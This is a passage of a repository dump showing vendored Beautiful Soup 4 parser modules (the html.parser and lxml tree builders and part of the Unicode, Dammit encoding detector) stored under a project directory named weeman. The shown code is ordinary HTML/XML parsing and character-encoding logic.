 25 | # http://bugs.python.org/issue13273 makes strict=True a better bet
 26 | # before Python 3.2.3.
 27 | #
 28 | # At the end of this file, we monkeypatch HTMLParser so that
 29 | # strict=True works well on Python 3.2.2.
 30 | major, minor, release = sys.version_info[:3]
 31 | CONSTRUCTOR_TAKES_STRICT = major == 3 and minor == 2 and release >= 3
 32 | CONSTRUCTOR_STRICT_IS_DEPRECATED = major == 3 and minor == 3
 33 | CONSTRUCTOR_TAKES_CONVERT_CHARREFS = major == 3 and minor >= 4
 34 | 
 35 | 
 36 | from lib.bs4.element import (
 37 |     CData,
 38 |     Comment,
 39 |     Declaration,
 40 |     Doctype,
 41 |     ProcessingInstruction,
 42 |     )
 43 | from lib.bs4.dammit import EntitySubstitution, UnicodeDammit
 44 | 
 45 | from lib.bs4.builder import (
 46 |     HTML,
 47 |     HTMLTreeBuilder,
 48 |     STRICT,
 49 |     )
 50 | 
 51 | 
 52 | HTMLPARSER = 'html.parser'
 53 | 
 54 | class BeautifulSoupHTMLParser(HTMLParser):
 55 |     def handle_starttag(self, name, attrs):
 56 |         # XXX namespace
 57 |         attr_dict = {}
 58 |         for key, value in attrs:
 59 |             # Change None attribute values to the empty string
 60 |             # for consistency with the other tree builders.
 61 |             if value is None:
 62 |                 value = ''
 63 |             attr_dict[key] = value
 64 |             attrvalue = '""'
 65 |         self.soup.handle_starttag(name, None, None, attr_dict)
 66 | 
 67 |     def handle_endtag(self, name):
 68 |         self.soup.handle_endtag(name)
 69 | 
 70 |     def handle_data(self, data):
 71 |         self.soup.handle_data(data)
 72 | 
 73 |     def handle_charref(self, name):
 74 |         # XXX workaround for a bug in HTMLParser. Remove this once
 75 |         # it's fixed in all supported versions.
 76 |         # http://bugs.python.org/issue13633
 77 |         if name.startswith('x'):
 78 |             real_name = int(name.lstrip('x'), 16)
 79 |         elif name.startswith('X'):
 80 |             real_name = int(name.lstrip('X'), 16)
 81 |         else:
 82 |             real_name = int(name)
 83 | 
 84 |         try:
 85 |             data = unichr(real_name)
 86 |         except (ValueError, OverflowError), e:
 87 |             data = u"\N{REPLACEMENT CHARACTER}"
 88 | 
 89 |         self.handle_data(data)
 90 | 
 91 |     def handle_entityref(self, name):
 92 |         character = EntitySubstitution.HTML_ENTITY_TO_CHARACTER.get(name)
 93 |         if character is not None:
 94 |             data = character
 95 |         else:
 96 |             data = "&%s;" % name
 97 |         self.handle_data(data)
 98 | 
 99 |     def handle_comment(self, data):
100 |         self.soup.endData()
101 |         self.soup.handle_data(data)
102 |         self.soup.endData(Comment)
103 | 
104 |     def handle_decl(self, data):
105 |         self.soup.endData()
106 |         if data.startswith("DOCTYPE "):
107 |             data = data[len("DOCTYPE "):]
108 |         elif data == 'DOCTYPE':
109 |             # i.e. "<!DOCTYPE>"
110 |             data = ''
111 |         self.soup.handle_data(data)
112 |         self.soup.endData(Doctype)
113 | 
114 |     def unknown_decl(self, data):
115 |         if data.upper().startswith('CDATA['):
116 |             cls = CData
117 |             data = data[len('CDATA['):]
118 |         else:
119 |             cls = Declaration
120 |         self.soup.endData()
121 |         self.soup.handle_data(data)
122 |         self.soup.endData(cls)
123 | 
124 |     def handle_pi(self, data):
125 |         self.soup.endData()
126 |         self.soup.handle_data(data)
127 |         self.soup.endData(ProcessingInstruction)
128 | 
129 | 
130 | class HTMLParserTreeBuilder(HTMLTreeBuilder):
131 | 
132 |     is_xml = False
133 |     picklable = True
134 |     NAME = HTMLPARSER
135 |     features = [NAME, HTML, STRICT]
136 | 
137 |     def __init__(self, *args, **kwargs):
138 |         if CONSTRUCTOR_TAKES_STRICT and not CONSTRUCTOR_STRICT_IS_DEPRECATED:
139 |             kwargs['strict'] = False
140 |         if CONSTRUCTOR_TAKES_CONVERT_CHARREFS:
141 |             kwargs['convert_charrefs'] = False
142 |         self.parser_args = (args, kwargs)
143 | 
144 |     def prepare_markup(self, markup, user_specified_encoding=None,
145 |                        document_declared_encoding=None, exclude_encodings=None):
146 |         """
147 |         :return: A 4-tuple (markup, original encoding, encoding
148 |         declared within markup, whether any characters had to be
149 |         replaced with REPLACEMENT CHARACTER).
150 |         """
151 |         if isinstance(markup, unicode):
152 |             yield (markup, None, None, False)
153 |             return
154 | 
155 |         try_encodings = [user_specified_encoding, document_declared_encoding]
156 |         dammit = UnicodeDammit(markup, try_encodings, is_html=True,
157 |                                exclude_encodings=exclude_encodings)
158 |         yield (dammit.markup, dammit.original_encoding,
159 |                dammit.declared_html_encoding,
160 |                dammit.contains_replacement_characters)
161 | 
162 |     def feed(self, markup):
163 |         args, kwargs = self.parser_args
164 |         parser = BeautifulSoupHTMLParser(*args, **kwargs)
165 |         parser.soup = self.soup
166 |         try:
167 |             parser.feed(markup)
168 |         except HTMLParseError, e:
169 |             warnings.warn(RuntimeWarning(
170 |                 "Python's built-in HTMLParser cannot parse the given document. This is not a bug in Beautiful Soup. The best solution is to install an external parser (lxml or html5lib), and use Beautiful Soup with that parser. See http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser for help."))
171 |             raise e
172 | 
173 | # Patch 3.2 versions of HTMLParser earlier than 3.2.3 to use some
174 | # 3.2.3 code. This ensures they don't treat markup like <p></p> as a
175 | # string.
176 | #
177 | # XXX This code can be removed once most Python 3 users are on 3.2.3.
178 | if major == 3 and minor == 2 and not CONSTRUCTOR_TAKES_STRICT:
179 |     import re
180 |     attrfind_tolerant = re.compile(
181 |         r'\s*((?<=[\'"\s])[^\s/>][^\s/=>]*)(\s*=+\s*'
182 |         r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?')
183 |     HTMLParserTreeBuilder.attrfind_tolerant = attrfind_tolerant
184 | 
185 |     locatestarttagend = re.compile(r"""
186 |   <[a-zA-Z][-.a-zA-Z0-9:_]*          # tag name
187 |   (?:\s+                             # whitespace before attribute name
188 |     (?:[a-zA-Z_][-.:a-zA-Z0-9_]*     # attribute name
189 |       (?:\s*=\s*                     # value indicator
190 |         (?:'[^']*'                   # LITA-enclosed value
191 |           |\"[^\"]*\"                # LIT-enclosed value
192 |           |[^'\">\s]+                # bare value
193 |          )
194 |        )?
195 |      )
196 |    )*
197 |   \s*                                # trailing whitespace
198 | """, re.VERBOSE)
199 |     BeautifulSoupHTMLParser.locatestarttagend = locatestarttagend
200 | 
201 |     from html.parser import tagfind, attrfind
202 | 
203 |     def parse_starttag(self, i):
204 |         self.__starttag_text = None
205 |         endpos = self.check_for_whole_start_tag(i)
206 |         if endpos < 0:
207 |             return endpos
208 |         rawdata = self.rawdata
209 |         self.__starttag_text = rawdata[i:endpos]
210 | 
211 |         # Now parse the data between i+1 and j into a tag and attrs
212 |         attrs = []
213 |         match = tagfind.match(rawdata, i+1)
214 |         assert match, 'unexpected call to parse_starttag()'
215 |         k = match.end()
216 |         self.lasttag = tag = rawdata[i+1:k].lower()
217 |         while k < endpos:
218 |             if self.strict:
219 |                 m = attrfind.match(rawdata, k)
220 |             else:
221 |                 m = attrfind_tolerant.match(rawdata, k)
222 |             if not m:
223 |                 break
224 |             attrname, rest, attrvalue = m.group(1, 2, 3)
225 |             if not rest:
226 |                 attrvalue = None
227 |             elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
228 |                  attrvalue[:1] == '"' == attrvalue[-1:]:
229 |                 attrvalue = attrvalue[1:-1]
230 |             if attrvalue:
231 |                 attrvalue = self.unescape(attrvalue)
232 |             attrs.append((attrname.lower(), attrvalue))
233 |             k = m.end()
234 | 
235 |         end = rawdata[k:endpos].strip()
236 |         if end not in (">", "/>"):
237 |             lineno, offset = self.getpos()
238 |             if "\n" in self.__starttag_text:
239 |                 lineno = lineno + self.__starttag_text.count("\n")
240 |                 offset = len(self.__starttag_text) \
241 |                          - self.__starttag_text.rfind("\n")
242 |             else:
243 |                 offset = offset + len(self.__starttag_text)
244 |             if self.strict:
245 |                 self.error("junk characters in start tag: %r"
246 |                            % (rawdata[k:endpos][:20],))
247 |             self.handle_data(rawdata[i:endpos])
248 |             return endpos
249 |         if end.endswith('/>'):
250 |             # XHTML-style empty tag: <span attr="value" />
251 |             self.handle_startendtag(tag, attrs)
252 |         else:
253 |             self.handle_starttag(tag, attrs)
254 |             if tag in self.CDATA_CONTENT_ELEMENTS:
255 |                 self.set_cdata_mode(tag)
256 |         return endpos
257 | 
258 |     def set_cdata_mode(self, elem):
259 |         self.cdata_elem = elem.lower()
260 |         self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
261 | 
262 |     BeautifulSoupHTMLParser.parse_starttag = parse_starttag
263 |     BeautifulSoupHTMLParser.set_cdata_mode = set_cdata_mode
264 | 
265 |     CONSTRUCTOR_TAKES_STRICT = True
266 | 


--------------------------------------------------------------------------------
/weeman/lib/bs4/builder/_lxml.py:
--------------------------------------------------------------------------------
  1 | # Use of this source code is governed by a BSD-style license that can be
  2 | # found in the LICENSE file.
  3 | __all__ = [
  4 |     'LXMLTreeBuilderForXML',
  5 |     'LXMLTreeBuilder',
  6 |     ]
  7 | 
  8 | from io import BytesIO
  9 | from StringIO import StringIO
 10 | import collections
 11 | from lxml import etree
 12 | from lib.bs4.element import (
 13 |     Comment,
 14 |     Doctype,
 15 |     NamespacedAttribute,
 16 |     ProcessingInstruction,
 17 |     XMLProcessingInstruction,
 18 | )
 19 | from lib.bs4.builder import (
 20 |     FAST,
 21 |     HTML,
 22 |     HTMLTreeBuilder,
 23 |     PERMISSIVE,
 24 |     ParserRejectedMarkup,
 25 |     TreeBuilder,
 26 |     XML)
 27 | from lib.bs4.dammit import EncodingDetector
 28 | 
 29 | LXML = 'lxml'
 30 | 
 31 | class LXMLTreeBuilderForXML(TreeBuilder):
 32 |     DEFAULT_PARSER_CLASS = etree.XMLParser
 33 | 
 34 |     is_xml = True
 35 |     processing_instruction_class = XMLProcessingInstruction
 36 | 
 37 |     NAME = "lxml-xml"
 38 |     ALTERNATE_NAMES = ["xml"]
 39 | 
 40 |     # Well, it's permissive by XML parser standards.
 41 |     features = [NAME, LXML, XML, FAST, PERMISSIVE]
 42 | 
 43 |     CHUNK_SIZE = 512
 44 | 
 45 |     # This namespace mapping is specified in the XML Namespace
 46 |     # standard.
 47 |     DEFAULT_NSMAPS = {'http://www.w3.org/XML/1998/namespace' : "xml"}
 48 | 
 49 |     def default_parser(self, encoding):
 50 |         # This can either return a parser object or a class, which
 51 |         # will be instantiated with default arguments.
 52 |         if self._default_parser is not None:
 53 |             return self._default_parser
 54 |         return etree.XMLParser(
 55 |             target=self, strip_cdata=False, recover=True, encoding=encoding)
 56 | 
 57 |     def parser_for(self, encoding):
 58 |         # Use the default parser.
 59 |         parser = self.default_parser(encoding)
 60 | 
 61 |         if isinstance(parser, collections.Callable):
 62 |             # Instantiate the parser with default arguments
 63 |             parser = parser(target=self, strip_cdata=False, encoding=encoding)
 64 |         return parser
 65 | 
 66 |     def __init__(self, parser=None, empty_element_tags=None):
 67 |         # TODO: Issue a warning if parser is present but not a
 68 |         # callable, since that means there's no way to create new
 69 |         # parsers for different encodings.
 70 |         self._default_parser = parser
 71 |         if empty_element_tags is not None:
 72 |             self.empty_element_tags = set(empty_element_tags)
 73 |         self.soup = None
 74 |         self.nsmaps = [self.DEFAULT_NSMAPS]
 75 | 
 76 |     def _getNsTag(self, tag):
 77 |         # Split the namespace URL out of a fully-qualified lxml tag
 78 |         # name. Copied from lxml's src/lxml/sax.py.
 79 |         if tag[0] == '{':
 80 |             return tuple(tag[1:].split('}', 1))
 81 |         else:
 82 |             return (None, tag)
 83 | 
 84 |     def prepare_markup(self, markup, user_specified_encoding=None,
 85 |                        exclude_encodings=None,
 86 |                        document_declared_encoding=None):
 87 |         """
 88 |         :yield: A series of 4-tuples.
 89 |          (markup, encoding, declared encoding,
 90 |           has undergone character replacement)
 91 | 
 92 |         Each 4-tuple represents a strategy for parsing the document.
 93 |         """
 94 |         # Instead of using UnicodeDammit to convert the bytestring to
 95 |         # Unicode using different encodings, use EncodingDetector to
 96 |         # iterate over the encodings, and tell lxml to try to parse
 97 |         # the document as each one in turn.
 98 |         is_html = not self.is_xml
 99 |         if is_html:
100 |             self.processing_instruction_class = ProcessingInstruction
101 |         else:
102 |             self.processing_instruction_class = XMLProcessingInstruction
103 | 
104 |         if isinstance(markup, unicode):
105 |             # We were given Unicode. Maybe lxml can parse Unicode on
106 |             # this system?
107 |             yield markup, None, document_declared_encoding, False
108 | 
109 |         if isinstance(markup, unicode):
110 |             # No, apparently not. Convert the Unicode to UTF-8 and
111 |             # tell lxml to parse it as UTF-8.
112 |             yield (markup.encode("utf8"), "utf8",
113 |                    document_declared_encoding, False)
114 | 
115 |         try_encodings = [user_specified_encoding, document_declared_encoding]
116 |         detector = EncodingDetector(
117 |             markup, try_encodings, is_html, exclude_encodings)
118 |         for encoding in detector.encodings:
119 |             yield (detector.markup, encoding, document_declared_encoding, False)
120 | 
121 |     def feed(self, markup):
122 |         if isinstance(markup, bytes):
123 |             markup = BytesIO(markup)
124 |         elif isinstance(markup, unicode):
125 |             markup = StringIO(markup)
126 | 
127 |         # Call feed() at least once, even if the markup is empty,
128 |         # or the parser won't be initialized.
129 |         data = markup.read(self.CHUNK_SIZE)
130 |         try:
131 |             self.parser = self.parser_for(self.soup.original_encoding)
132 |             self.parser.feed(data)
133 |             while len(data) != 0:
134 |                 # Now call feed() on the rest of the data, chunk by chunk.
135 |                 data = markup.read(self.CHUNK_SIZE)
136 |                 if len(data) != 0:
137 |                     self.parser.feed(data)
138 |             self.parser.close()
139 |         except (UnicodeDecodeError, LookupError, etree.ParserError), e:
140 |             raise ParserRejectedMarkup(str(e))
141 | 
142 |     def close(self):
143 |         self.nsmaps = [self.DEFAULT_NSMAPS]
144 | 
145 |     def start(self, name, attrs, nsmap={}):
146 |         # Make sure attrs is a mutable dict--lxml may send an immutable dictproxy.
147 |         attrs = dict(attrs)
148 |         nsprefix = None
149 |         # Invert each namespace map as it comes in.
150 |         if len(self.nsmaps) > 1:
151 |             # There are no new namespaces for this tag, but
152 |             # non-default namespaces are in play, so we need a
153 |             # separate tag stack to know when they end.
154 |             self.nsmaps.append(None)
155 |         elif len(nsmap) > 0:
156 |             # A new namespace mapping has come into play.
157 |             inverted_nsmap = dict((value, key) for key, value in nsmap.items())
158 |             self.nsmaps.append(inverted_nsmap)
159 |             # Also treat the namespace mapping as a set of attributes on the
160 |             # tag, so we can recreate it later.
161 |             attrs = attrs.copy()
162 |             for prefix, namespace in nsmap.items():
163 |                 attribute = NamespacedAttribute(
164 |                     "xmlns", prefix, "http://www.w3.org/2000/xmlns/")
165 |                 attrs[attribute] = namespace
166 | 
167 |         # Namespaces are in play. Find any attributes that came in
168 |         # from lxml with namespaces attached to their names, and
169 |         # turn then into NamespacedAttribute objects.
170 |         new_attrs = {}
171 |         for attr, value in attrs.items():
172 |             namespace, attr = self._getNsTag(attr)
173 |             if namespace is None:
174 |                 new_attrs[attr] = value
175 |             else:
176 |                 nsprefix = self._prefix_for_namespace(namespace)
177 |                 attr = NamespacedAttribute(nsprefix, attr, namespace)
178 |                 new_attrs[attr] = value
179 |         attrs = new_attrs
180 | 
181 |         namespace, name = self._getNsTag(name)
182 |         nsprefix = self._prefix_for_namespace(namespace)
183 |         self.soup.handle_starttag(name, namespace, nsprefix, attrs)
184 | 
185 |     def _prefix_for_namespace(self, namespace):
186 |         """Find the currently active prefix for the given namespace."""
187 |         if namespace is None:
188 |             return None
189 |         for inverted_nsmap in reversed(self.nsmaps):
190 |             if inverted_nsmap is not None and namespace in inverted_nsmap:
191 |                 return inverted_nsmap[namespace]
192 |         return None
193 | 
194 |     def end(self, name):
195 |         self.soup.endData()
196 |         completed_tag = self.soup.tagStack[-1]
197 |         namespace, name = self._getNsTag(name)
198 |         nsprefix = None
199 |         if namespace is not None:
200 |             for inverted_nsmap in reversed(self.nsmaps):
201 |                 if inverted_nsmap is not None and namespace in inverted_nsmap:
202 |                     nsprefix = inverted_nsmap[namespace]
203 |                     break
204 |         self.soup.handle_endtag(name, nsprefix)
205 |         if len(self.nsmaps) > 1:
206 |             # This tag, or one of its parents, introduced a namespace
207 |             # mapping, so pop it off the stack.
208 |             self.nsmaps.pop()
209 | 
210 |     def pi(self, target, data):
211 |         self.soup.endData()
212 |         self.soup.handle_data(target + ' ' + data)
213 |         self.soup.endData(self.processing_instruction_class)
214 | 
215 |     def data(self, content):
216 |         self.soup.handle_data(content)
217 | 
218 |     def doctype(self, name, pubid, system):
219 |         self.soup.endData()
220 |         doctype = Doctype.for_name_and_ids(name, pubid, system)
221 |         self.soup.object_was_parsed(doctype)
222 | 
223 |     def comment(self, content):
224 |         "Handle comments as Comment objects."
225 |         self.soup.endData()
226 |         self.soup.handle_data(content)
227 |         self.soup.endData(Comment)
228 | 
229 |     def test_fragment_to_document(self, fragment):
230 |         """See `TreeBuilder`."""
231 |         return u'<?xml version="1.0" encoding="utf-8"?>\n%s' % fragment
232 | 
233 | 
234 | class LXMLTreeBuilder(HTMLTreeBuilder, LXMLTreeBuilderForXML):
235 | 
236 |     NAME = LXML
237 |     ALTERNATE_NAMES = ["lxml-html"]
238 | 
239 |     features = ALTERNATE_NAMES + [NAME, HTML, FAST, PERMISSIVE]
240 |     is_xml = False
241 |     processing_instruction_class = ProcessingInstruction
242 | 
243 |     def default_parser(self, encoding):
244 |         return etree.HTMLParser
245 | 
246 |     def feed(self, markup):
247 |         encoding = self.soup.original_encoding
248 |         try:
249 |             self.parser = self.parser_for(encoding)
250 |             self.parser.feed(markup)
251 |             self.parser.close()
252 |         except (UnicodeDecodeError, LookupError, etree.ParserError), e:
253 |             raise ParserRejectedMarkup(str(e))
254 | 
255 | 
256 |     def test_fragment_to_document(self, fragment):
257 |         """See `TreeBuilder`."""
258 |         return u'<html><body>%s</body></html>' % fragment
259 | 


--------------------------------------------------------------------------------
/weeman/lib/bs4/dammit.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | """Beautiful Soup bonus library: Unicode, Dammit
  3 | 
  4 | This library converts a bytestream to Unicode through any means
  5 | necessary. It is heavily based on code from Mark Pilgrim's Universal
  6 | Feed Parser. It works best on XML and HTML, but it does not rewrite the
  7 | XML or HTML to reflect a new encoding; that's the tree builder's job.
  8 | """
  9 | # Use of this source code is governed by a BSD-style license that can be
 10 | # found in the LICENSE file.
 11 | __license__ = "MIT"
 12 | 
 13 | import codecs
 14 | from htmlentitydefs import codepoint2name
 15 | import re
 16 | import logging
 17 | import string
 18 | 
 19 | # Import a library to autodetect character encodings.
 20 | chardet_type = None
 21 | try:
 22 |     # First try the fast C implementation.
 23 |     #  PyPI package: cchardet
 24 |     import cchardet
 25 |     def chardet_dammit(s):
 26 |         return cchardet.detect(s)['encoding']
 27 | except ImportError:
 28 |     try:
 29 |         # Fall back to the pure Python implementation
 30 |         #  Debian package: python-chardet
 31 |         #  PyPI package: chardet
 32 |         import chardet
 33 |         def chardet_dammit(s):
 34 |             return chardet.detect(s)['encoding']
 35 |         #import chardet.constants
 36 |         #chardet.constants._debug = 1
 37 |     except ImportError:
 38 |         # No chardet available.
 39 |         def chardet_dammit(s):
 40 |             return None
 41 | 
 42 | # Available from http://cjkpython.i18n.org/.
 43 | try:
 44 |     import iconv_codec
 45 | except ImportError:
 46 |     pass
 47 | 
 48 | xml_encoding_re = re.compile(
 49 |     '^<\?.*encoding=[\'"](.*?)[\'"].*\?>'.encode(), re.I)
 50 | html_meta_re = re.compile(
 51 |     '<\s*meta[^>]+charset\s*=\s*["\']?([^>]*?)[ /;\'">]'.encode(), re.I)
 52 | 
 53 | class EntitySubstitution(object):
 54 | 
 55 |     """Substitute XML or HTML entities for the corresponding characters."""
 56 | 
 57 |     def _populate_class_variables():
 58 |         lookup = {}
 59 |         reverse_lookup = {}
 60 |         characters_for_re = []
 61 |         for codepoint, name in list(codepoint2name.items()):
 62 |             character = unichr(codepoint)
 63 |             if codepoint != 34:
 64 |                 # There's no point in turning the quotation mark into
 65 |                 # &quot;, unless it happens within an attribute value, which
 66 |                 # is handled elsewhere.
 67 |                 characters_for_re.append(character)
 68 |                 lookup[character] = name
 69 |             # But we do want to turn &quot; into the quotation mark.
 70 |             reverse_lookup[name] = character
 71 |         re_definition = "[%s]" % "".join(characters_for_re)
 72 |         return lookup, reverse_lookup, re.compile(re_definition)
 73 |     (CHARACTER_TO_HTML_ENTITY, HTML_ENTITY_TO_CHARACTER,
 74 |      CHARACTER_TO_HTML_ENTITY_RE) = _populate_class_variables()
 75 | 
 76 |     CHARACTER_TO_XML_ENTITY = {
 77 |         "'": "apos",
 78 |         '"': "quot",
 79 |         "&": "amp",
 80 |         "<": "lt",
 81 |         ">": "gt",
 82 |         }
 83 | 
 84 |     BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|"
 85 |                                            "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)"
 86 |                                            ")")
 87 | 
 88 |     AMPERSAND_OR_BRACKET = re.compile("([<>&])")
 89 | 
 90 |     @classmethod
 91 |     def _substitute_html_entity(cls, matchobj):
 92 |         entity = cls.CHARACTER_TO_HTML_ENTITY.get(matchobj.group(0))
 93 |         return "&%s;" % entity
 94 | 
 95 |     @classmethod
 96 |     def _substitute_xml_entity(cls, matchobj):
 97 |         """Used with a regular expression to substitute the
 98 |         appropriate XML entity for an XML special character."""
 99 |         entity = cls.CHARACTER_TO_XML_ENTITY[matchobj.group(0)]
100 |         return "&%s;" % entity
101 | 
102 |     @classmethod
103 |     def quoted_attribute_value(self, value):
104 |         """Make a value into a quoted XML attribute, possibly escaping it.
105 | 
106 |          Most strings will be quoted using double quotes.
107 | 
108 |           Bob's Bar -> "Bob's Bar"
109 | 
110 |          If a string contains double quotes, it will be quoted using
111 |          single quotes.
112 | 
113 |           Welcome to "my bar" -> 'Welcome to "my bar"'
114 | 
115 |          If a string contains both single and double quotes, the
116 |          double quotes will be escaped, and the string will be quoted
117 |          using double quotes.
118 | 
119 |           Welcome to "Bob's Bar" -> "Welcome to &quot;Bob's bar&quot;
120 |         """
121 |         quote_with = '"'
122 |         if '"' in value:
123 |             if "'" in value:
124 |                 # The string contains both single and double
125 |                 # quotes.  Turn the double quotes into
126 |                 # entities. We quote the double quotes rather than
127 |                 # the single quotes because the entity name is
128 |                 # "&quot;" whether this is HTML or XML.  If we
129 |                 # quoted the single quotes, we'd have to decide
130 |                 # between &apos; and &squot;.
131 |                 replace_with = "&quot;"
132 |                 value = value.replace('"', replace_with)
133 |             else:
134 |                 # There are double quotes but no single quotes.
135 |                 # We can use single quotes to quote the attribute.
136 |                 quote_with = "'"
137 |         return quote_with + value + quote_with
138 | 
139 |     @classmethod
140 |     def substitute_xml(cls, value, make_quoted_attribute=False):
141 |         """Substitute XML entities for special XML characters.
142 | 
143 |         :param value: A string to be substituted. The less-than sign
144 |           will become &lt;, the greater-than sign will become &gt;,
145 |           and any ampersands will become &amp;. If you want ampersands
146 |           that appear to be part of an entity definition to be left
147 |           alone, use substitute_xml_containing_entities() instead.
148 | 
149 |         :param make_quoted_attribute: If True, then the string will be
150 |          quoted, as befits an attribute value.
151 |         """
152 |         # Escape angle brackets and ampersands.
153 |         value = cls.AMPERSAND_OR_BRACKET.sub(
154 |             cls._substitute_xml_entity, value)
155 | 
156 |         if make_quoted_attribute:
157 |             value = cls.quoted_attribute_value(value)
158 |         return value
159 | 
160 |     @classmethod
161 |     def substitute_xml_containing_entities(
162 |         cls, value, make_quoted_attribute=False):
163 |         """Substitute XML entities for special XML characters.
164 | 
165 |         :param value: A string to be substituted. The less-than sign will
166 |           become &lt;, the greater-than sign will become &gt;, and any
167 |           ampersands that are not part of an entity defition will
168 |           become &amp;.
169 | 
170 |         :param make_quoted_attribute: If True, then the string will be
171 |          quoted, as befits an attribute value.
172 |         """
173 |         # Escape angle brackets, and ampersands that aren't part of
174 |         # entities.
175 |         value = cls.BARE_AMPERSAND_OR_BRACKET.sub(
176 |             cls._substitute_xml_entity, value)
177 | 
178 |         if make_quoted_attribute:
179 |             value = cls.quoted_attribute_value(value)
180 |         return value
181 | 
182 |     @classmethod
183 |     def substitute_html(cls, s):
184 |         """Replace certain Unicode characters with named HTML entities.
185 | 
186 |         This differs from data.encode(encoding, 'xmlcharrefreplace')
187 |         in that the goal is to make the result more readable (to those
188 |         with ASCII displays) rather than to recover from
189 |         errors. There's absolutely nothing wrong with a UTF-8 string
190 |         containg a LATIN SMALL LETTER E WITH ACUTE, but replacing that
191 |         character with "&eacute;" will make it more readable to some
192 |         people.
193 |         """
194 |         return cls.CHARACTER_TO_HTML_ENTITY_RE.sub(
195 |             cls._substitute_html_entity, s)
196 | 
197 | 
198 | class EncodingDetector:
199 |     """Suggests a number of possible encodings for a bytestring.
200 | 
201 |     Order of precedence:
202 | 
203 |     1. Encodings you specifically tell EncodingDetector to try first
204 |     (the override_encodings argument to the constructor).
205 | 
206 |     2. An encoding declared within the bytestring itself, either in an
207 |     XML declaration (if the bytestring is to be interpreted as an XML
208 |     document), or in a <meta> tag (if the bytestring is to be
209 |     interpreted as an HTML document.)
210 | 
211 |     3. An encoding detected through textual analysis by chardet,
212 |     cchardet, or a similar external library.
213 | 
214 |     4. UTF-8.
215 | 
216 |     5. Windows-1252.
217 |     """
218 |     def __init__(self, markup, override_encodings=None, is_html=False,
219 |                  exclude_encodings=None):
220 |         self.override_encodings = override_encodings or []
221 |         exclude_encodings = exclude_encodings or []
222 |         self.exclude_encodings = set([x.lower() for x in exclude_encodings])
223 |         self.chardet_encoding = None
224 |         self.is_html = is_html
225 |         self.declared_encoding = None
226 | 
227 |         # First order of business: strip a byte-order mark.
228 |         self.markup, self.sniffed_encoding = self.strip_byte_order_mark(markup)
229 | 
230 |     def _usable(self, encoding, tried):
231 |         if encoding is not None:
232 |             encoding = encoding.lower()
233 |             if encoding in self.exclude_encodings:
234 |                 return False
235 |             if encoding not in tried:
236 |                 tried.add(encoding)
237 |                 return True
238 |         return False
239 | 
240 |     @property
241 |     def encodings(self):
242 |         """Yield a number of encodings that might work for this markup."""
243 |         tried = set()
244 |         for e in self.override_encodings:
245 |             if self._usable(e, tried):
246 |                 yield e
247 | 
248 |         # Did the document originally start with a byte-order mark
249 |         # that indicated its encoding?
250 |         if self._usable(self.sniffed_encoding, tried):
251 |             yield self.sniffed_encoding
252 | 
253 |         # Look within the document for an XML or HTML encoding
254 |         # declaration.
255 |         if self.declared_encoding is None:
256 |             self.declared_encoding = self.find_declared_encoding(
257 |                 self.markup, self.is_html)
258 |         if self._usable(self.declared_encoding, tried):
259 |             yield self.declared_encoding
260 | 
261 |         # Use third-party character set detection to guess at the
262 |         # encoding.
263 |         if self.chardet_encoding is None:
264 |             self.chardet_encoding = chardet_dammit(self.markup)
265 |         if self._usable(self.chardet_encoding, tried):
266 |             yield self.chardet_encoding
267 | 
268 |         # As a last-ditch effort, try utf-8 and windows-1252.
269 |         for e in ('utf-8', 'windows-1252'):
270 |             if self._usable(e, tried):
271 |                 yield e
272 | 
273 |     @classmethod
274 |     def strip_byte_order_mark(cls, data):
275 |         """If a byte-order mark is present, strip it and return the encoding it implies."""
276 |         encoding = None
277 |         if isinstance(data, unicode):
278 |             # Unicode data cannot have a byte-order mark.
279 |             return data, encoding
280 |         if (len(data) >= 4) and (data[:2] == b'\xfe\xff') \
281 |                and (data[2:4] != '\x00\x00'):
282 |             encoding = 'utf-16be'
283 |             data = data[2:]
284 |         elif (len(data) >= 4) and (data[:2] == b'\xff\xfe') \
285 |                  and (data[2:4] != '\x00\x00'):
286 |             encoding = 'utf-16le'
287 |             data = data[2:]
288 |         elif data[:3] == b'\xef\xbb\xbf':
289 |             encoding = 'utf-8'
290 |             data = data[3:]
291 |         elif data[:4] == b'\x00\x00\xfe\xff':
292 |             encoding = 'utf-32be'
293 |             data = data[4:]
294 |         elif data[:4] == b'\xff\xfe\x00\x00':
295 |             encoding = 'utf-32le'
296 |             data = data[4:]
297 |         return data, encoding
298 | 
299 |     @classmethod
300 |     def find_declared_encoding(cls, markup, is_html=False, search_entire_document=False):
301 |         """Given a document, tries to find its declared encoding.
302 | 
303 |         An XML encoding is declared at the beginning of the document.
304 | 
305 |         An HTML encoding is declared in a <meta> tag, hopefully near the
306 |         beginning of the document.
307 |         """
308 |         if search_entire_document:
309 |             xml_endpos = html_endpos = len(markup)
310 |         else:
311 |             xml_endpos = 1024
312 |             html_endpos = max(2048, int(len(markup) * 0.05))
313 |             
314 |         declared_encoding = None
315 |         declared_encoding_match = xml_encoding_re.search(markup, endpos=xml_endpos)
316 |         if not declared_encoding_match and is_html:
317 |             declared_encoding_match = html_meta_re.search(markup, endpos=html_endpos)
318 |         if declared_encoding_match is not None:
319 |             declared_encoding = declared_encoding_match.groups()[0].decode(
320 |                 'ascii', 'replace')
321 |         if declared_encoding:
322 |             return declared_encoding.lower()
323 |         return None
324 | 
325 | class UnicodeDammit:
326 |     """A class for detecting the encoding of a *ML document and
327 |     converting it to a Unicode string. If the source encoding is
328 |     windows-1252, can replace MS smart quotes with their HTML or XML
329 |     equivalents."""
330 | 
331 |     # This dictionary maps commonly seen values for "charset" in HTML
332 |     # meta tags to the corresponding Python codec names. It only covers
333 |     # values that aren't in Python's aliases and can't be determined
334 |     # by the heuristics in find_codec.
335 |     CHARSET_ALIASES = {"macintosh": "mac-roman",
336 |                        "x-sjis": "shift-jis"}
337 | 
338 |     ENCODINGS_WITH_SMART_QUOTES = [
339 |         "windows-1252",
340 |         "iso-8859-1",
341 |         "iso-8859-2",
342 |         ]
343 | 
344 |     def __init__(self, markup, override_encodings=[],
345 |                  smart_quotes_to=None, is_html=False, exclude_encodings=[]):
346 |         self.smart_quotes_to = smart_quotes_to
347 |         self.tried_encodings = []
348 |         self.contains_replacement_characters = False
349 |         self.is_html = is_html
